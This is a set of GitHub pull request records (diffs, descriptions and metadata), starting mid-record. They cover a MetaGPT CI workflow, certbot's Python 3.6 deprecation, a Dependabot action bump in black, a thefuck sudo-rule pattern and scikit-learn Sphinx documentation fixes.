+ ./junit/test-results-${{ matrix.python-version }}.xml
+ ./htmlcov/
+ retention-days: 3
+ if: ${{ always() }}
+
\ No newline at end of file
| **Features**
add github actions unittest
Example: https://github.com/voidking/MetaGPT/actions/runs/7353165983
**Result**


| https://api.github.com/repos/geekan/MetaGPT/pulls/650 | 2023-12-29T02:35:44Z | 2023-12-29T03:08:52Z | 2023-12-29T03:08:52Z | 2023-12-29T03:08:52Z | 477 | geekan/MetaGPT | 16,531 |
Deprecate Python 3.6 support | diff --git a/acme/acme/__init__.py b/acme/acme/__init__.py
index 8b6ce88c09d..b4cbf5e4533 100644
--- a/acme/acme/__init__.py
+++ b/acme/acme/__init__.py
@@ -6,6 +6,7 @@
"""
import sys
+import warnings
# This code exists to keep backwards compatibility with people using acme.jose
# before it became the standalone josepy package.
@@ -19,3 +20,11 @@
# preserved (acme.jose.* is josepy.*)
if mod == 'josepy' or mod.startswith('josepy.'):
sys.modules['acme.' + mod.replace('josepy', 'jose', 1)] = sys.modules[mod]
+
+
+if sys.version_info[:2] == (3, 6):
+ warnings.warn(
+ "Python 3.6 support will be dropped in the next release of "
+ "acme. Please upgrade your Python version.",
+ PendingDeprecationWarning,
+ ) # pragma: no cover
diff --git a/certbot/CHANGELOG.md b/certbot/CHANGELOG.md
index b43154db782..1ac183409a1 100644
--- a/certbot/CHANGELOG.md
+++ b/certbot/CHANGELOG.md
@@ -9,6 +9,8 @@ Certbot adheres to [Semantic Versioning](https://semver.org/).
* Added `show_account` subcommand, which will fetch the account information
from the ACME server and show the account details (account URL and, if
applicable, email address or addresses)
+* We deprecated support for Python 3.6 in Certbot and its ACME library.
+ Support for Python 3.6 will be removed in the next major release of Certbot.
### Changed
diff --git a/certbot/certbot/__init__.py b/certbot/certbot/__init__.py
index 3f9e235bd0c..fe0a2a4169b 100644
--- a/certbot/certbot/__init__.py
+++ b/certbot/certbot/__init__.py
@@ -1,3 +1,13 @@
"""Certbot client."""
# version number like 1.2.3a0, must have at least 2 parts, like 1.2
+import sys
+import warnings
+
__version__ = '1.23.0.dev0'
+
+if sys.version_info[:2] == (3, 6):
+ warnings.warn(
+ "Python 3.6 support will be dropped in the next release of "
+ "certbot. Please upgrade your Python version.",
+ PendingDeprecationWarning,
+ ) # pragma: no cover
diff --git a/certbot/certbot/_internal/main.py b/certbot/certbot/_internal/main.py
index 15a7239f61d..f4062efaae4 100644
--- a/certbot/certbot/_internal/main.py
+++ b/certbot/certbot/_internal/main.py
@@ -1673,6 +1673,10 @@ def main(cli_args: List[str] = None) -> Optional[Union[str, int]]:
zope.component.provideUtility(report, interfaces.IReporter)
util.atexit_register(report.print_messages)
+ if sys.version_info[:2] == (3, 6):
+ logger.warning("Python 3.6 support will be dropped in the next release "
+ "of Certbot - please upgrade your Python version.")
+
with make_displayer(config) as displayer:
display_obj.set_display(displayer)
diff --git a/pytest.ini b/pytest.ini
index 92a403451e2..ea15938082c 100644
--- a/pytest.ini
+++ b/pytest.ini
@@ -27,6 +27,8 @@
# 7) botocore's default TLS settings raise deprecation warnings in Python
# 3.10+, but their values are sane from a security perspective. See
# https://github.com/boto/botocore/issues/2550.
+# 8) Ignore our own PendingDeprecationWarning about Python 3.6 soon to be dropped.
+# See https://github.com/certbot/certbot/pull/9160.
filterwarnings =
error
ignore:The external mock module:PendingDeprecationWarning
@@ -36,3 +38,4 @@ filterwarnings =
ignore:decodestring\(\) is a deprecated alias:DeprecationWarning:dns
ignore:_SixMetaPathImporter.:ImportWarning
ignore:ssl.PROTOCOL_TLS:DeprecationWarning:botocore
+ ignore:Python 3.6 support will be dropped:PendingDeprecationWarning
| Fixes https://github.com/certbot/certbot/issues/8983
Python 3.6 is now EOL: https://endoflife.date/python
This is normally a good time to create warnings about Python 3.6 deprecation the Certbot upcoming release 1.23.0 so that its support is removed in 1.24.0.
We have to say here that EPEL maintainers asked us to keep maintaining support of Python 3.6 because Python 3.7 will never be shipped to CentOS 7. This support would be needed in theory up to 2 more years, basically until CentOS 7 EOL in 2024-06-30. It has been said that we could support as a best effort until a reasonable need on Certbot side requires to drop Python 3.6. See https://github.com/certbot/certbot/issues/8983 for more information.
However some of us (including me) consider that there is already a reasonable need right now. Indeed, keeping the support on Python 3.6 while the Python community globally moves away from it will pin implicitly some Certbot dependencies to the last version of these dependencies supporting Python 3.6 as the upstream maintainers decide to make the move. At any point in a future time, one of these dependencies could require an urgent upgrade (typically a critical uncovered vulnerability): then we would require to drop Python 3.6 immediately without further notice instead of following an organized deprecation path.
This reason motivates to proactively deprecate then drop the Python versions once they are EOL. You can see the discussion in Mattermost starting from [this post](https://opensource.eff.org/eff-open-source/pl/ntzs9zy1fprjmkso3xrqspnoce) to get more elements about the reasoning.
| https://api.github.com/repos/certbot/certbot/pulls/9160 | 2022-01-06T21:03:28Z | 2022-01-21T20:42:05Z | 2022-01-21T20:42:05Z | 2022-01-22T16:35:45Z | 1,077 | certbot/certbot | 163 |
Bump peter-evans/find-comment from 2.4.0 to 3.0.0 | diff --git a/.github/workflows/diff_shades_comment.yml b/.github/workflows/diff_shades_comment.yml
index 9b3b4b579da..206fcfdaf48 100644
--- a/.github/workflows/diff_shades_comment.yml
+++ b/.github/workflows/diff_shades_comment.yml
@@ -33,7 +33,7 @@ jobs:
- name: Try to find pre-existing PR comment
if: steps.metadata.outputs.needs-comment == 'true'
id: find-comment
- uses: peter-evans/find-comment@a54c31d7fa095754bfef525c0c8e5e5674c4b4b1
+ uses: peter-evans/find-comment@d5fe37641ad8451bdd80312415672ba26c86575e
with:
issue-number: ${{ steps.metadata.outputs.pr-number }}
comment-author: "github-actions[bot]"
| Bumps [peter-evans/find-comment](https://github.com/peter-evans/find-comment) from 2.4.0 to 3.0.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/peter-evans/find-comment/releases">peter-evans/find-comment's releases</a>.</em></p>
<blockquote>
<h2>Find Comment v3.0.0</h2>
<p>⚙️ Updated runtime to Node.js 20</p>
<ul>
<li>The action now requires a minimum version of <a href="https://github.com/actions/runner/releases/tag/v2.308.0">v2.308.0</a> for the Actions runner. Update self-hosted runners to v2.308.0 or later to ensure compatibility.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>build(deps-dev): bump prettier from 2.8.7 to 2.8.8 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/173">peter-evans/find-comment#173</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.15.13 to 18.16.3 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/175">peter-evans/find-comment#175</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.0 to 5.59.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/176">peter-evans/find-comment#176</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.0 to 5.59.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/174">peter-evans/find-comment#174</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.1 to 5.59.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/177">peter-evans/find-comment#177</a></li>
<li>build(deps-dev): bump eslint from 8.39.0 to 8.40.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/179">peter-evans/find-comment#179</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.1 to 5.59.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/178">peter-evans/find-comment#178</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.3 to 18.16.5 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/180">peter-evans/find-comment#180</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.2 to 5.59.5 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/181">peter-evans/find-comment#181</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.2 to 5.59.5 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/183">peter-evans/find-comment#183</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.5 to 18.16.9 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/182">peter-evans/find-comment#182</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.5 to 5.59.6 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/184">peter-evans/find-comment#184</a></li>
<li>build(deps-dev): bump eslint from 8.40.0 to 8.41.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/186">peter-evans/find-comment#186</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.9 to 18.16.13 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/187">peter-evans/find-comment#187</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.5 to 5.59.6 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/185">peter-evans/find-comment#185</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.13 to 18.16.16 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/188">peter-evans/find-comment#188</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.6 to 5.59.7 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/190">peter-evans/find-comment#190</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.6 to 5.59.7 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/189">peter-evans/find-comment#189</a></li>
<li>build(deps-dev): bump eslint from 8.41.0 to 8.42.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/191">peter-evans/find-comment#191</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.7 to 5.59.8 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/193">peter-evans/find-comment#193</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.7 to 5.59.8 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/194">peter-evans/find-comment#194</a></li>
<li>build(deps-dev): bump eslint-plugin-github from 4.7.0 to 4.8.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/192">peter-evans/find-comment#192</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.8 to 5.59.9 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/195">peter-evans/find-comment#195</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.8 to 5.59.9 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/197">peter-evans/find-comment#197</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.16 to 18.16.17 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/196">peter-evans/find-comment#196</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.9 to 5.59.11 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/198">peter-evans/find-comment#198</a></li>
<li>build(deps-dev): bump eslint from 8.42.0 to 8.43.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/199">peter-evans/find-comment#199</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.17 to 18.16.18 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/200">peter-evans/find-comment#200</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.9 to 5.59.11 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/201">peter-evans/find-comment#201</a></li>
<li>build(deps-dev): bump eslint-plugin-jest from 27.2.1 to 27.2.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/202">peter-evans/find-comment#202</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.11 to 5.60.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/203">peter-evans/find-comment#203</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.11 to 5.60.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/204">peter-evans/find-comment#204</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.18 to 18.16.19 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/205">peter-evans/find-comment#205</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.60.0 to 5.60.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/206">peter-evans/find-comment#206</a></li>
<li>build(deps-dev): bump eslint from 8.43.0 to 8.44.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/207">peter-evans/find-comment#207</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.60.0 to 5.60.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/208">peter-evans/find-comment#208</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.60.1 to 5.61.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/209">peter-evans/find-comment#209</a></li>
<li>build(deps): bump tough-cookie from 4.1.2 to 4.1.3 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/211">peter-evans/find-comment#211</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.60.1 to 5.61.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/210">peter-evans/find-comment#210</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.61.0 to 5.62.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/212">peter-evans/find-comment#212</a></li>
<li>build(deps-dev): bump eslint from 8.44.0 to 8.45.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/214">peter-evans/find-comment#214</a></li>
<li>build(deps-dev): bump eslint-plugin-jest from 27.2.2 to 27.2.3 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/215">peter-evans/find-comment#215</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.61.0 to 5.62.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/213">peter-evans/find-comment#213</a></li>
<li>build(deps-dev): bump eslint-plugin-github from 4.8.0 to 4.9.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/216">peter-evans/find-comment#216</a></li>
<li>build(deps-dev): bump word-wrap from 1.2.3 to 1.2.4 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/217">peter-evans/find-comment#217</a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/peter-evans/find-comment/commit/d5fe37641ad8451bdd80312415672ba26c86575e"><code>d5fe376</code></a> feat: update runtime to node 20 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/282">#282</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/e3754082ec6536fb0f8c4c6ebb4c2682cf6efa67"><code>e375408</code></a> build(deps-dev): bump <code>@types/node</code> from 18.19.6 to 18.19.8 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/279">#279</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/6f781399d61362a4f5121bab933bbad888ecd659"><code>6f78139</code></a> build(deps-dev): bump prettier from 3.2.1 to 3.2.4 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/278">#278</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/663f5b8fd865055f01a344810af292dd4b5f0d5b"><code>663f5b8</code></a> build(deps-dev): bump eslint-plugin-jest from 27.6.1 to 27.6.3 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/276">#276</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/1950d4859087e02b21eefc8ad70c114702f3daba"><code>1950d48</code></a> build(deps-dev): bump prettier from 3.1.1 to 3.2.1 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/277">#277</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/4c49b27bc3472947b5de8b4ed6732a81960286a8"><code>4c49b27</code></a> build(deps-dev): bump eslint-plugin-prettier from 5.1.2 to 5.1.3 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/275">#275</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/141f79c0a836a288f9e9108fa5fb9128b0166869"><code>141f79c</code></a> build(deps-dev): bump <code>@types/node</code> from 18.19.4 to 18.19.6 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/274">#274</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/90d027df0ed038f7d73baa358f32756bececd141"><code>90d027d</code></a> build(deps-dev): bump eslint-plugin-jest from 27.6.0 to 27.6.1 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/273">#273</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/4541d1b6b0e618acc24284e118743fc5ad0bc5de"><code>4541d1b</code></a> build(deps-dev): bump eslint-plugin-prettier from 5.1.1 to 5.1.2 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/272">#272</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/3e2c601e8c32795632a106e9c0ae030f1699756e"><code>3e2c601</code></a> build(deps-dev): bump <code>@types/node</code> from 18.19.3 to 18.19.4 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/271">#271</a>)</li>
<li>Additional commits viewable in <a href="https://github.com/peter-evans/find-comment/compare/a54c31d7fa095754bfef525c0c8e5e5674c4b4b1...d5fe37641ad8451bdd80312415672ba26c86575e">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/psf/black/pulls/4190 | 2024-01-29T06:45:58Z | 2024-01-29T16:27:21Z | 2024-01-29T16:27:21Z | 2024-01-29T16:27:22Z | 207 | psf/black | 24,377 |
Add sudo rule for Aura | diff --git a/thefuck/rules/sudo.py b/thefuck/rules/sudo.py
index fd745661c..91e5f4bbc 100644
--- a/thefuck/rules/sudo.py
+++ b/thefuck/rules/sudo.py
@@ -19,7 +19,8 @@
'you don\'t have access to the history db.',
'authentication is required',
'edspermissionerror',
- 'you don\'t have write permissions']
+ 'you don\'t have write permissions',
+ 'use `sudo`']
def match(command):
| When installing from Arch User Repository without root:
aura >>= You have to use `sudo` for that.
This PR adds the slightly more general, but unambiguous, "use `sudo`".
It might be helpful to also add "use sudo" (no backticks) - but I haven't since I don't know for sure it's in use.
Closes #543.
| https://api.github.com/repos/nvbn/thefuck/pulls/557 | 2016-09-30T19:35:56Z | 2016-10-02T15:21:05Z | 2016-10-02T15:21:04Z | 2016-10-03T22:17:43Z | 127 | nvbn/thefuck | 30,621 |
DOC minor doc fixes for sphinx. | diff --git a/doc/modules/linear_model.rst b/doc/modules/linear_model.rst
index 0293cc04a997a..7e7e76077926c 100644
--- a/doc/modules/linear_model.rst
+++ b/doc/modules/linear_model.rst
@@ -754,7 +754,7 @@ For large dataset, you may also consider using :class:`SGDClassifier` with 'log'
* :ref:`sphx_glr_auto_examples_linear_model_plot_logistic_path.py`
- * :ref:`example_linear_model_plot_logistic_multinomial.py`
+ * :ref:`sphx_glr_auto_examples_linear_model_plot_logistic_multinomial.py`
.. _liblinear_differences:
@@ -1118,7 +1118,7 @@ in the following ways.
.. topic:: Examples:
- * :ref:`example_linear_model_plot_huber_vs_ridge.py`
+ * :ref:`sphx_glr_auto_examples_linear_model_plot_huber_vs_ridge.py`
.. topic:: References:
diff --git a/doc/modules/mixture.rst b/doc/modules/mixture.rst
index 5e3c2c448de7c..cf9c3ea7e7e5a 100644
--- a/doc/modules/mixture.rst
+++ b/doc/modules/mixture.rst
@@ -175,7 +175,7 @@ points.
.. topic:: Examples:
- * See :ref:`plot_bayesian_gaussian_mixture.py` for a comparaison of
+ * See :ref:`sphx_glr_auto_examples_plot_bayesian_gaussian_mixture.py` for a comparaison of
the results of the ``BayesianGaussianMixture`` for different values
of the parameter ``dirichlet_concentration_prior``.
@@ -190,10 +190,10 @@ Pros
expectation-maximization solutions.
:Automatic selection: when `dirichlet_concentration_prior` is small enough and
-`n_components` is larger than what is found necessary by the model, the
-Variational Bayesian mixture model has a natural tendency to set some mixture
-weights values close to zero. This makes it possible to let the model choose a
-suitable number of effective components automatically.
+ `n_components` is larger than what is found necessary by the model, the
+ Variational Bayesian mixture model has a natural tendency to set some mixture
+ weights values close to zero. This makes it possible to let the model choose a
+ suitable number of effective components automatically.
Cons
.....
diff --git a/doc/modules/model_evaluation.rst b/doc/modules/model_evaluation.rst
index 1abec9a49184c..690e85f9150bf 100644
--- a/doc/modules/model_evaluation.rst
+++ b/doc/modules/model_evaluation.rst
@@ -1083,7 +1083,7 @@ Here is a small example of usage of this function:::
.. topic:: Example:
- * See :ref:`example_calibration_plot_calibration.py`
+ * See :ref:`sphx_glr_calibration_plot_calibration.py`
for an example of Brier score loss usage to perform probability
calibration of classifiers.
diff --git a/doc/testimonials/testimonials.rst b/doc/testimonials/testimonials.rst
index 0355ca36f539b..5c0ac1b306b59 100644
--- a/doc/testimonials/testimonials.rst
+++ b/doc/testimonials/testimonials.rst
@@ -292,7 +292,9 @@ Greg Lamp, Co-founder Yhat
.. raw:: html
</span>
-------------------------------------------
+
+`Rangespan <https://www.rangespan.com>_`
+----------------------------------------
.. raw:: html
diff --git a/doc/tutorial/statistical_inference/finding_help.rst b/doc/tutorial/statistical_inference/finding_help.rst
index 9d73929fa72d1..9d2c0d48e3074 100644
--- a/doc/tutorial/statistical_inference/finding_help.rst
+++ b/doc/tutorial/statistical_inference/finding_help.rst
@@ -19,9 +19,6 @@ Q&A communities with Machine Learning practitioners
also features some interesting discussions:
https://www.quora.com/topic/Machine-Learning
- Have a look at the best questions section, eg: `What are some
- good resources for learning about machine learning`_.
-
:Stack Exchange:
The Stack Exchange family of sites hosts `multiple subdomains for Machine Learning questions`_.
diff --git a/doc/whats_new.rst b/doc/whats_new.rst
index b5611d07b1a0e..220920b715f22 100644
--- a/doc/whats_new.rst
+++ b/doc/whats_new.rst
@@ -290,7 +290,7 @@ Enhancements
- Added support for substituting or disabling :class:`pipeline.Pipeline`
and :class:`pipeline.FeatureUnion` components using the ``set_params``
interface that powers :mod:`sklearn.grid_search`.
- See :ref:`example_plot_compare_reduction.py`. By `Joel Nothman`_ and
+ See :ref:`sphx_glr_plot_compare_reduction.py`. By `Joel Nothman`_ and
`Robert McGibbon`_.
Bug fixes
@@ -385,7 +385,7 @@ Bug fixes
Oliveira <https://github.com/caioaao>`_.
- Fix :class:`linear_model.ElasticNet` sparse decision function to match
- output with dense in the multioutput case.
+ output with dense in the multioutput case.
API changes summary
-------------------
@@ -4458,3 +4458,5 @@ David Huard, Dave Morrill, Ed Schofield, Travis Oliphant, Pearu Peterson.
.. _Mads Jensen: https://github.com/indianajensen
.. _Sebastián Vanrell: https://github.com/srvanrell
+
+.. _Robert McGibbon: https://github.com/rmcgibbo
diff --git a/sklearn/datasets/descr/breast_cancer.rst b/sklearn/datasets/descr/breast_cancer.rst
index 8e12472941a66..547b41021ef2f 100644
--- a/sklearn/datasets/descr/breast_cancer.rst
+++ b/sklearn/datasets/descr/breast_cancer.rst
@@ -30,6 +30,7 @@ Data Set Characteristics:
- WDBC-Benign
:Summary Statistics:
+
===================================== ====== ======
Min Max
===================================== ====== ======
diff --git a/sklearn/decomposition/kernel_pca.py b/sklearn/decomposition/kernel_pca.py
index bc429f85890da..fdd1f852c6af3 100644
--- a/sklearn/decomposition/kernel_pca.py
+++ b/sklearn/decomposition/kernel_pca.py
@@ -100,7 +100,7 @@ class KernelPCA(BaseEstimator, TransformerMixin):
dual_coef_ : array, (n_samples, n_features)
Inverse transform matrix. If `fit_inverse_transform=False`,
- dual_coef_ is not present.
+ ``dual_coef_`` is not present.
X_transformed_fit_ : array, (n_samples, n_components)
Projection of the fitted data on the kernel principal components.
diff --git a/sklearn/decomposition/pca.py b/sklearn/decomposition/pca.py
index 881a4a593cfd2..aecab027b7db8 100644
--- a/sklearn/decomposition/pca.py
+++ b/sklearn/decomposition/pca.py
@@ -183,7 +183,7 @@ class PCA(_BasePCA):
components_ : array, [n_components, n_features]
Principal axes in feature space, representing the directions of
maximum variance in the data. The components are sorted by
- explained_variance_.
+ ``explained_variance_``.
explained_variance_ : array, [n_components]
The amount of variance explained by each of the selected components.
@@ -514,7 +514,7 @@ def score(self, X, y=None):
@deprecated("RandomizedPCA was deprecated in 0.18 and will be removed in 0.20. "
"Use PCA(svd_solver='randomized') instead. The new implementation "
- "DOES NOT store whiten components_. Apply transform to get them.")
+ "DOES NOT store whiten ``components_``. Apply transform to get them.")
class RandomizedPCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA) using randomized SVD
diff --git a/sklearn/multioutput.py b/sklearn/multioutput.py
index f8393d74c3273..e650bff25b580 100644
--- a/sklearn/multioutput.py
+++ b/sklearn/multioutput.py
@@ -147,8 +147,8 @@ def score(self, X, y, sample_weight=None):
predicts the expected value of y, disregarding the input features,
would get a R^2 score of 0.0.
- Note
- ----
+ Notes
+ -----
R^2 is calculated by weighting all the targets equally using
`multioutput='uniform_average'`.
diff --git a/sklearn/preprocessing/data.py b/sklearn/preprocessing/data.py
index 1c3d8db580272..e7f242cdedc5d 100644
--- a/sklearn/preprocessing/data.py
+++ b/sklearn/preprocessing/data.py
@@ -933,7 +933,7 @@ class RobustScaler(BaseEstimator, TransformerMixin):
quantile_range : tuple (q_min, q_max), 0.0 < q_min < q_max < 100.0
Default: (25.0, 75.0) = (1st quantile, 3rd quantile) = IQR
- Quantile range used to calculate scale_
+ Quantile range used to calculate ``scale_``.
.. versionadded:: 0.18
@@ -1101,7 +1101,7 @@ def robust_scale(X, axis=0, with_centering=True, with_scaling=True,
quantile_range : tuple (q_min, q_max), 0.0 < q_min < q_max < 100.0
Default: (25.0, 75.0) = (1st quantile, 3rd quantile) = IQR
- Quantile range used to calculate scale_
+ Quantile range used to calculate ``scale_``.
.. versionadded:: 0.18
| What it says on the label.
